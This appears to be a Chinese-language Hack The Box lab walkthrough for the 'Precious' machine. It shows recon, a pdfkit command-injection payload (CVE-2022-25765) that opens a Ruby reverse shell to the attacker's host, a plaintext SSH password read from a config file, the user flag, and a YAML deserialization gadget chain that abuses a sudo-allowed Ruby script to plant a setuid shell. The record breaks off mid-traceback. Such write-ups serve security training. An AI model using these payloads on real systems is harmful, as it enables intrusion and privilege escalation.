Precious-htb-writeup

0x00 靶场技能介绍

章节技能：命令执行漏洞、CVE-2022-25765漏洞利用、配置文件密码泄露、.yml + ruby 错配提权

参考链接：https://0xdf.gitlab.io/2023/05/20/htb-precious.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.189

2、尝试下连通率

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.189 -c 4   
PING 10.10.11.189 (10.10.11.189) 56(84) bytes of data.
64 bytes from 10.10.11.189: icmp_seq=1 ttl=63 time=392 ms
64 bytes from 10.10.11.189: icmp_seq=2 ttl=63 time=308 ms
64 bytes from 10.10.11.189: icmp_seq=3 ttl=63 time=297 ms
64 bytes from 10.10.11.189: icmp_seq=4 ttl=63 time=357 ms

--- 10.10.11.189 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3008ms
rtt min/avg/max/mdev = 297.461/338.650/392.328/38.362 ms

3、获取下端口开放情况

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.11.189 
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-29 15:48 CST
Nmap scan report for 10.10.11.189
Host is up (0.32s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 21.95 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.11.189 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-29 15:53 CST
Nmap scan report for 10.10.11.189
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.98 seconds

4、这里把获取的域名情况，做下hosts绑定

1
2
3

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.11.189 precious.htb" | sudo tee -a /etc/hosts
10.10.11.189 precious.htb

5、开启下目录扫描

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://precious.htb/ --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://precious.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://precious.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_precious.htb/__23-12-29_16-04-37.txt

Target: http://precious.htb/

[16:04:37] Starting: 

Task Completed

6、在做下子域名扫描

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dns -d precious.htb -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     precious.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/dnsrecon/subdomains-top1mil-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Progress: 5000 / 5001 (99.98%)
===============================================================
Finished
===============================================================

7、啥都没有，那就看下网站主目录的情况吧

8、可以到这是一个远程读取网站，并生成pdf的网站，我们尝试下并排的命令执行看下

POST / HTTP/1.1
Host: precious.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://precious.htb
Connection: close
Referer: http://precious.htb/
Upgrade-Insecure-Requests: 1

url=http://127.0.0.1 | id


HTTP/1.1 200 OK
Content-Type: application/pdf
Content-Length: 4595
Connection: close
Status: 200 OK
Content-Disposition: attachment; filename="gosi481kgref9k8ztjhu0xsftvzgh5j2.pdf"
Last-Modified: Fri, 29 Dec 2023 08:18:57 GMT
X-Content-Type-Options: nosniff
Date: Fri, 29 Dec 2023 08:18:57 GMT
X-Powered-By: Phusion Passenger(R) 6.0.15
Server: nginx/1.18.0 + Phusion Passenger(R) 6.0.15
X-Runtime: Ruby

%PDF-1.4
%Ã¢Ã£
1 0 obj
<<
/Title ()
/Creator (þÿ
<<
/Size 11 
/Info 1 0 R
/Root 2 0 R
>>
startxref
1039 
%%EOF
%BeginExifToolUpdate
1 0 obj
<<
/Creator (Generated by pdfkit v0.8.6)
>>
endobj
11 0 obj
<<
/Type /Metadata
/Subtype /XML
/Length 2829
>>

9、我们获取到了这个系统的名称和版本信息，我们使用谷歌搜集到以下漏洞信息

https://github.com/shamo0/PDFkit-CMD-Injection

CVE-2022-25765 pdfkit <0.8.6 命令注入。

10、这里直接使用该漏洞的利用代码进行尝试

┌──(kali㉿kali)-[~/桌面]
└─$ curl 'precious.htb' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: precious.htb' -H 'Connection: keep-alive' -H 'Referer: precious.htb' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F10.10.14.3%3A443%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.14.3%22%2C443%29%29%27%60'
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

11、我们成功的获取到了一个交互式的shell界面

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443                    
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.189] 36212
id
uid=1001(ruby) gid=1001(ruby) groups=1001(ruby)
python3 -c 'import pty;pty.spawn("/bin/bash")'
ruby@precious:/var/www/pdfapp$ ls
ls
app  config  config.ru  Gemfile  Gemfile.lock  pdf  public
ruby@precious:/var/www/pdfapp$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26  2022 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 app
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 config
-rw-r--r-- 1 root ruby   59 Sep 10  2022 config.ru
-rw-r--r-- 1 root ruby   99 Sep 17  2022 Gemfile
-rw-r--r-- 1 root ruby  478 Sep 26  2022 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 29 03:20 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 public
ruby@precious:/var/www/pdfapp$ cat config.ru
cat config.ru
require_relative './config/environment'
run PdfControllers
ruby@precious:/var/www/pdfapp$ cd config
cd config
ruby@precious:/var/www/pdfapp/config$ ls
ls
environment.rb
ruby@precious:/var/www/pdfapp/config$ cat environment.rb
cat environment.rb
require 'bundler/setup'

APP_ENV = ENV["RACK_ENV"] || "development"

Bundler.require :default, APP_ENV.to_sym

require 'rubygems'
require 'bundler'

require_rel '../app'
ruby@precious:/var/www/pdfapp/config$ cd ../
cd ../
ruby@precious:/var/www/pdfapp$
ruby@precious:/var/www/pdfapp$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26  2022 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 app
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 config
-rw-r--r-- 1 root ruby   59 Sep 10  2022 config.ru
-rw-r--r-- 1 root ruby   99 Sep 17  2022 Gemfile
-rw-r--r-- 1 root ruby  478 Sep 26  2022 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 29 03:20 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 public
ruby@precious:/var/www/pdfapp$ ls -la /home
ls -la /home
total 16
drwxr-xr-x  4 root  root  4096 Oct 26  2022 .
drwxr-xr-x 18 root  root  4096 Nov 21  2022 ..
drwxr-xr-x  2 henry henry 4096 Oct 26  2022 henry
drwxr-xr-x  4 ruby  ruby  4096 Dec 29 02:59 ruby
ruby@precious:/var/www/pdfapp$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for ruby: 

Sorry, try again.
[sudo] password for ruby: 

Sorry, try again.
[sudo] password for ruby: 

sudo: 3 incorrect password attempts
ruby@precious:/var/www/pdfapp$ 

ruby@precious:/var/www/pdfapp$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26  2022 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 app
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 config
-rw-r--r-- 1 root ruby   59 Sep 10  2022 config.ru
-rw-r--r-- 1 root ruby   99 Sep 17  2022 Gemfile
-rw-r--r-- 1 root ruby  478 Sep 26  2022 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 29 03:20 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 public
ruby@precious:/var/www/pdfapp$ cd app
cd app
ruby@precious:/var/www/pdfapp/app$ ls -la
ls -la
total 16
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 6 root root 4096 Oct 26  2022 ..
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 controllers
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 views
ruby@precious:/var/www/pdfapp/app$ cd controllers
cd controllers
ruby@precious:/var/www/pdfapp/app/controllers$ ls -la
ls -la
total 12
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 ..
-rw-r--r-- 1 root ruby  725 Sep 24  2022 pdf.rb
ruby@precious:/var/www/pdfapp/app/controllers$ cat pdf.rb
cat pdf.rb
class PdfControllers < Sinatra::Base

  configure do
    set :views, "app/views"
    set :public_dir, "public"
  end

  get '/' do
    erb :'index'
  end

  post '/' do
    url = ERB.new(params[:url]).result(binding)
    if url =~ /^https?:\/\//i
      filename = Array.new(32){rand(36).to_s(36)}.join + '.pdf'
      path = 'pdf/' + filename

      begin
           PDFKit.new(url).to_file(path)
          cmd = `exiftool -overwrite_original -all= -creator="Generated by pdfkit v0.8.6" -xmptoolkit= #{path}`
          send_file path, :disposition => 'attachment'
      rescue
           @msg = 'Cannot load remote URL!'
      end

    else
        @msg = 'You should provide a valid URL!'
    end
    erb :'index'
  end
end

ruby@precious:/var/www/pdfapp/app/controllers$ 


ruby@precious:/var/www/pdfapp/app/controllers$ cd .. 
cd ..
ruby@precious:/var/www/pdfapp/app$ ls -la
ls -la
total 16
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 6 root root 4096 Oct 26  2022 ..
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 controllers
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 views
ruby@precious:/var/www/pdfapp/app$ cd views
cd views
ruby@precious:/var/www/pdfapp/app/views$ ls -la
ls -la
total 12
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 ..
-rw-r--r-- 1 root ruby  494 Sep 10  2022 index.erb
ruby@precious:/var/www/pdfapp/app/views$ cat index.erb
cat index.erb
<!DOCTYPE html>
<html>
<head>
    <title>Convert Web Page to PDF</title>
    <link rel="stylesheet" href="stylesheets/style.css">
</head>
<body>
    <div class="wrapper">
        <h1 class="title">Convert Web Page to PDF</h1>
        <form action="/" method="post">
            <p>Enter URL to fetch</p><br>
            <input type="text" name="url" value="">
            <input type="submit" value="Submit">
        </form>
        <h2 class="msg"><%= @msg %></h2>
    </div> 
</body>
</html>
ruby@precious:/var/www/pdfapp/app/views$ cd ../
cd ../
ruby@precious:/var/www/pdfapp/app$ ls -la
ls -la
total 16
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 6 root root 4096 Oct 26  2022 ..
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 controllers
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 views
ruby@precious:/var/www/pdfapp/app$ cd ../
cd ../
ruby@precious:/var/www/pdfapp$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26  2022 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 app
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 config
-rw-r--r-- 1 root ruby   59 Sep 10  2022 config.ru
-rw-r--r-- 1 root ruby   99 Sep 17  2022 Gemfile
-rw-r--r-- 1 root ruby  478 Sep 26  2022 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 29 03:20 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 public
ruby@precious:/var/www/pdfapp$ cat Gemfile 
cat Gemfile
source "http://rubygems.org"

#gem 'shotgun'
gem "sinatra"
gem 'require_all'
gem "pdfkit", "0.8.6"
ruby@precious:/var/www/pdfapp$ cat Gemfile.lock
cat Gemfile.lock
GEM
  remote: http://rubygems.org/
  specs:
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    pdfkit (0.8.6)
    rack (2.2.4)
    rack-protection (3.0.0)
      rack
    require_all (3.0.0)
    ruby2_keywords (0.0.5)
    sinatra (3.0.0)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
      rack-protection (= 3.0.0)
      tilt (~> 2.0)
    tilt (2.0.11)

PLATFORMS
  x86_64-linux

DEPENDENCIES
  pdfkit (= 0.8.6)
  require_all
  sinatra

BUNDLED WITH
   2.3.22
ruby@precious:/var/www/pdfapp$ cd pdf
cd pdf
ruby@precious:/var/www/pdfapp/pdf$ ls
ls
ruby@precious:/var/www/pdfapp/pdf$ cd ../
cd ../
ruby@precious:/var/www/pdfapp$ cd public
cd public
ruby@precious:/var/www/pdfapp/public$ ls
ls
images  stylesheets
ruby@precious:/var/www/pdfapp/public$ ls -la
ls -la
total 16
drwxr-xr-x 4 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 6 root root 4096 Oct 26  2022 ..
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 images
drwxr-xr-x 2 root ruby 4096 Oct 26  2022 stylesheets
ruby@precious:/var/www/pdfapp/public$ cd images
cd images
ruby@precious:/var/www/pdfapp/public/images$ ls
ls
ruby@precious:/var/www/pdfapp/public/images$ cd ../
cd ../
ruby@precious:/var/www/pdfapp/public$ cd stylesheets
cd stylesheets
ruby@precious:/var/www/pdfapp/public/stylesheets$ ls
ls
style.css
ruby@precious:/var/www/pdfapp/public/stylesheets$ cd ../../
cd ../../
ruby@precious:/var/www/pdfapp$ cd ../
cd ../
ruby@precious:/var/www$ ls -la
ls -la
total 16
drwxr-xr-x  4 root root 4096 Oct 26  2022 .
drwxr-xr-x 12 root root 4096 Oct 26  2022 ..
drwxr-xr-x  2 root root 4096 Oct 26  2022 html
drwxr-xr-x  6 root root 4096 Oct 26  2022 pdfapp
ruby@precious:/var/www$ cd html
cd html
ruby@precious:/var/www/html$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Oct 26  2022 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
-rw-r--r-- 1 root root  612 Sep 26  2022 index.nginx-debian.html
ruby@precious:/var/www/html$ cat index.nginx-debian.html
cat index.nginx-debian.html
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
ruby@precious:/var/www/html$ 


ruby@precious:/var/www/html$ cd /etc/nginx/
cd /etc/nginx/
ruby@precious:/etc/nginx$ ls -la
ls -la
total 72
drwxr-xr-x  8 root root 4096 Nov 21  2022 .
drwxr-xr-x 79 root root 4096 Dec 29 02:44 ..
drwxr-xr-x  2 root root 4096 Oct 26  2022 conf.d
-rw-r--r--  1 root root 1125 May 29  2021 fastcgi.conf
-rw-r--r--  1 root root 1055 May 29  2021 fastcgi_params
-rw-r--r--  1 root root 2837 May 29  2021 koi-utf
-rw-r--r--  1 root root 2223 May 29  2021 koi-win
-rw-r--r--  1 root root 3957 May 29  2021 mime.types
drwxr-xr-x  2 root root 4096 Oct 26  2022 modules-available
drwxr-xr-x  2 root root 4096 Oct 26  2022 modules-enabled
-rw-r--r--  1 root root 1447 May 29  2021 nginx.conf
-rw-r--r--  1 root root  180 May 29  2021 proxy_params
-rw-r--r--  1 root root  636 May 29  2021 scgi_params
drwxr-xr-x  2 root root 4096 Nov 21  2022 sites-available
drwxr-xr-x  2 root root 4096 Oct 26  2022 sites-enabled
drwxr-xr-x  2 root root 4096 Nov 21  2022 snippets
-rw-r--r--  1 root root  664 May 29  2021 uwsgi_params
-rw-r--r--  1 root root 3071 May 29  2021 win-utf
ruby@precious:/etc/nginx$ cat nginx.conf
cat nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
        worker_connections 768;
        # multi_accept on;
}

http {

        ##
        # Basic Settings
        ##

        sendfile on;
        tcp_nopush on;
        types_hash_max_size 2048;
        # server_tokens off;

        # server_names_hash_bucket_size 64;
        # server_name_in_redirect off;

        include /etc/nginx/mime.types;
        default_type application/octet-stream;

        ##
        # SSL Settings
        ##

        ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
        ssl_prefer_server_ciphers on;

        ##
        # Logging Settings
        ##

        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;

        ##
        # Gzip Settings
        ##

        gzip on;

        # gzip_vary on;
        # gzip_proxied any;
        # gzip_comp_level 6;
        # gzip_buffers 16 8k;
        # gzip_http_version 1.1;
        # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

        ##
        # Virtual Host Configs
        ##

        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}


#mail {
#       # See sample authentication script at:
#       # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
#       # auth_http localhost/auth.php;
#       # pop3_capabilities "TOP" "USER";
#       # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
#       server {
#               listen     localhost:110;
#               protocol   pop3;
#               proxy      on;
#       }
#
#       server {
#               listen     localhost:143;
#               protocol   imap;
#               proxy      on;
#       }
#}
ruby@precious:/etc/nginx$ cd conf.d
cd conf.d
ruby@precious:/etc/nginx/conf.d$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Oct 26  2022 .
drwxr-xr-x 8 root root 4096 Nov 21  2022 ..
-rw-r--r-- 1 root root  259 Sep 18  2022 mod-http-passenger.conf
ruby@precious:/etc/nginx/conf.d$ cat mod-http-passenger.conf
cat mod-http-passenger.conf
### Begin automatically installed Phusion Passenger config snippet ###
passenger_root /usr/lib/ruby/vendor_ruby/phusion_passenger/locations.ini;
passenger_ruby /usr/bin/passenger_free_ruby;
### End automatically installed Phusion Passenger config snippet ###
ruby@precious:/etc/nginx/conf.d$ cat /usr/lib/ruby/vendor_ruby/phusion_passenger/locations.ini
<ib/ruby/vendor_ruby/phusion_passenger/locations.ini
[locations]
packaging_method=deb
bin_dir=/usr/bin
support_binaries_dir=/usr/lib/passenger/support-binaries
lib_dir=/usr/lib/passenger
helper_scripts_dir=/usr/share/passenger/helper-scripts
resources_dir=/usr/share/passenger
include_dir=/usr/share/passenger/include
doc_dir=/usr/share/doc/passenger
ruby_libdir=/usr/lib/ruby/vendor_ruby
node_libdir=/usr/share/passenger/node
apache2_module_path=/usr/lib/apache2/modules/mod_passenger.so
ruby_extension_source_dir=/usr/share/passenger/ruby_extension_source
nginx_module_source_dir=/usr/share/passenger/ngx_http_passenger_module
ruby@precious:/etc/nginx/conf.d$ cat /usr/bin/passenger_free_ruby
ruby@precious:~$ ss -ltn
ss -ltn
State  Recv-Q Send-Q Local Address:Port  Peer Address:PortProcess
LISTEN 0      511          0.0.0.0:80         0.0.0.0:*          
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*          
LISTEN 0      500        127.0.0.1:43323      0.0.0.0:*          
LISTEN 0      511             [::]:80            [::]:*          
LISTEN 0      128             [::]:22            [::]:*          
ruby@precious:~$ ss -lt
ss -lt
State  Recv-Q Send-Q Local Address:Port  Peer Address:PortProcess
LISTEN 0      511          0.0.0.0:http       0.0.0.0:*          
LISTEN 0      128          0.0.0.0:ssh        0.0.0.0:*          
LISTEN 0      500        127.0.0.1:43323      0.0.0.0:*          
LISTEN 0      511             [::]:http          [::]:*          
LISTEN 0      128             [::]:ssh           [::]:*          
ruby@precious:~$ curl 127.0.0.1:43323
curl 127.0.0.1:43323
curl: (52) Empty reply from server
ruby@precious:~$

12、在我按照以往的经验各种检索中，我发现了再当前用户的根目录下的，某个文件里存在一个账号密码信息

ruby@precious:/var/www/pdfapp/config$ cd ~
cd ~
ruby@precious:~$ ls -la
ls -la
total 76
drwxr-xr-x 4 ruby ruby  4096 Dec 29 03:53 .
drwxr-xr-x 4 root root  4096 Oct 26  2022 ..
lrwxrwxrwx 1 root root     9 Oct 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby   220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby  3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby  4096 Oct 26  2022 .bundle
drwxr-xr-x 3 ruby ruby  4096 Dec 29 02:59 .cache
-rwxr-xr-x 1 ruby ruby 46631 Jan  7  2020 LinEnum.sh
-rw-r--r-- 1 ruby ruby   807 Mar 27  2022 .profile
ruby@precious:~$ cd .bundle
cd .bundle
ruby@precious:~/.bundle$ ls -la
ls -la
total 12
dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 4 ruby ruby 4096 Dec 29 03:53 ..
-r-xr-xr-x 1 root ruby   62 Sep 26  2022 config
ruby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
ruby@precious:~/.bundle$

13、这里直接使用账号密码进行登录，并成功获取到第一个flag信息

┌──(kali㉿kali)-[~/桌面]
└─$ ssh henry@10.10.11.189
henry@10.10.11.189's password: 
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
henry@precious:~$ ls
user.txt
henry@precious:~$ cat user.txt
149b5b288b64f28dba45240787cf62c9

0x02 系统权限获取

14、查看下sudo -l 的信息

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

15、继续查看下这个文件信息

henry@precious:~$ ls -la /opt/update_dependencies.rb
-rwxr-xr-x 1 root root 848 Sep 25  2022 /opt/update_dependencies.rb
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end
henry@precious:~$

16、发现可以通过修改 dependencies.yml 文件，进行提权，但是我不会写rb代码，也不熟悉这个语言，故直接参考演练报告

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cp /bin/bash /tmp/shiyan; chmod 6777 /tmp/shiyan
         method_id: :resolve

17、我们接下来就是进行尝试利用，并获取到最终的flag信息

henry@precious:~$ cd /opt/
henry@precious:/opt$ ls
sample  update_dependencies.rb
henry@precious:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Oct 26  2022 .
drwxr-xr-x 18 root root 4096 Nov 21  2022 ..
drwxr-xr-x  2 root root 4096 Oct 26  2022 sample
-rwxr-xr-x  1 root root  848 Sep 25  2022 update_dependencies.rb
henry@precious:/opt$ touch dependencies.yml
touch: cannot touch 'dependencies.yml': Permission denied
henry@precious:/opt$ cd /tmp
henry@precious:/tmp$ ls
passenger.kCXMasI
runtime-ruby
systemd-private-53b6be14bf5c49bf890a413f1840c4c8-systemd-logind.service-FqYTxg
vmware-root_401-1857883248
henry@precious:/tmp$ touch dependencies.yml
henry@precious:/tmp$ vim dependencies.yml 
-bash: vim: command not found
henry@precious:/tmp$ vi dependencies.yml 
henry@precious:/tmp$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:/tmp$ sudo ruby /opt/update_dependencies.rb
sh: 1: reading: not found
Traceback (most recent call last):
        33: from /opt/update_dependencies.rb:17:in `<main>'
        32: from /opt/update_dependencies.rb:10:in `list_from_file'
        31: from /usr/lib/ruby/2.7.0/psych.rb:279:in `load'
        30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in `to_ruby'
        29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
        28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
        27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
        26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in `visit_Psych_Nodes_Document'
        25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
        24: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
        23: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
        22: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:141:in `visit_Psych_Nodes_Sequence'
        21: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `register_empty'
        20: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `each'
        19: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `block in register_empty'
        18: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
        17: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
        16: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
        15: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:208:in `visit_Psych_Nodes_Mapping'
